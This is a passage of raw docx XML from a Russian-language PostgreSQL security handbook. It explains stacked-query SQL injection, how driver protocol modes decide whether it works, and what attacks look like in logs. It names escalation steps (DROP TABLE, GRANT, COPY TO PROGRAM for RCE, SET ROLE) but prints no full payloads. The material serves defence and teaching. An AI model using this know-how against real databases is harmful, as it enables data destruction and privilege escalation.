        <w:t>rds_superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Максимум — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PG_VERSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через уровень (1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для fingerprinting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD1105C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Детальный разбор по провайдерам — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.9 Managed-провайдеры: RDS, Cloud SQL, Supabase</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6D6EC5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.5.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003F2AC7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stacked queries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атака, при которой через инъекцию в один SQL-запрос подаются несколько команд, разделённых </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. В классическом MySQL-мире это либо «всегда работает», либо «всегда блокировано» — на уровне сервера. В PostgreSQL ситуация другая: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>сервер всегда поддерживает мульти-команды в simple query, и всегда отказывает в extended query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (см. 2.1 про протоколы wire). Уязвимость живёт не в сервере, а в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>выборе драйвером протокола</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и в том, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>передаёт ли разработчик параметры через API драйвера</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1258B20B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Два режима wire-protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB307BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Simple query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQexec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, frontend message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">): сервер принимает строку SQL целиком и парсит её как последовательность statement-ов через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>. Стакинг работает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423CF1A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Extended query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQexecParams</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQprepare</w:t>
      </w:r>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQexecPrepared</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, сообщения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Parse</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bind</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Execute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">): сервер парсит ровно одну команду. На второй команде в строке возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: cannot insert multiple commands into a prepared statement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ещё на этапе Parse — до Bind, до Execute, до того как payload достигнет планировщика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370E5EDE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Что определяет режим в коде</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5A3906" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Каждый драйвер выбирает протокол по своим правилам. Главный вход — наличие или отсутствие параметров в API-вызове:</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1893CC4C"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94A74DE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Режим протокола →</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87252BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Простой (simple)</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4DD4B04" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Расширенный (extended)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="1088F7F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112C0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Параметры переданы драйверу</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D370D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Зависит от драйвера (asyncpg, Java statement)</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9C056D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Стакинг блокирован</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="185BA971"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9DC8F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Параметры НЕ переданы (raw SQL)</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33D72A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Стакинг проходит</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D256E0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F801445" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Поэтому правило «параметризованные запросы защищают от инъекций» в PostgreSQL верно только если параметризация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>действительно ушла в API драйвера</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через отдельный аргумент, а не была собрана в строку через f-string / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.format</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / конкатенацию. Также есть драйверы с явным переключателем (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>preferQueryMode=simple</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в pgjdbc, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>simple_protocol=true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в pgx) — он принудительно переводит даже параметризованные вызовы в simple, и стакинг возвращается.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9641BB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Что произойдёт, если стакинг прошёл</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02647249" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Вторая команда после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исполняется в той же сессии, под теми же привилегиями, в той же транзакции (если она открыта). Если приложение работает в autocommit-режиме — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DROP TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSERT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> коммитятся немедленно. Если стакинг внутри явной транзакции — действие применяется при commit. Возвращается только результат последней команды, поэтому первый </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> приложение увидит как пустой ответ (или как сбой курсора), а DDL/DML тихо пройдут на сервере. Эти эффекты общие для всех подразделов 3.5.1–3.5.6 и в них не дублируются.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62811BB5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Как выглядит атака в логах</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E10C9A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри литерала параметра, попавшего в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_statement=all</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — конкретный маркер: точка с запятой между значимыми SQL-токенами, не внутри обычной строки данных</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35149616" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_statement=ddl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_statement=mod</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — DDL/DML от application-роли, которая по своей бизнес-логике DDL/DML не делает (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DROP TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от роли read-only API)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CE86FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — записи с двумя нормализованными командами в одной строке (видны как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>... ; ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после нормализации, специфично для simple-protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1D45D8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Ошибка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cannot insert multiple commands into a prepared statement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от application-роли — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>сигнал неудавшейся атаки</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в extended-режиме: payload дошёл до сервера, но был отклонён на Parse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0D3048" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Эти сигналы общие для всех подразделов 3.5.1–3.5.6 и далее не повторяются.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E021892" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Связанные паттерны</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0175476C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (data-modifying CTE) — альтернативный способ получить side-effect одной командой, через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH … AS (INSERT/UPDATE/DELETE)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Работает даже в extended-режиме. Граница: 3.5 — несколько команд через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>, 3.10 — одна команда с WITH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B41BE6C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (COPY FROM/TO PROGRAM) — типичная «вторая команда» после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в эскалации до RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7432F3F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (SET ROLE) — «вторая команда» для смены привилегий внутри stacked-пачки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C597E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Карта подразделов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7460E98E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   3.5.1 psycopg2 (text-mode default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ECE3B9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   3.5.2 psycopg3 (extended default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE902DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   3.5.3 asyncpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1F4C72" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   3.5.4 pgjdbc (Statement vs PreparedStatement, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>preferQueryMode</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C496CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   3.5.5 pgx (Go, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>simple_protocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD9BA5F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   3.5.6 node-postgres (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg.query(text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg.query(text, values)</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACF9312" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   3.5.7 Итоговая таблица: драйвер × режим → проходит ли стакинг</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4849FB18" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.5.1 psycopg2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5932B497" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
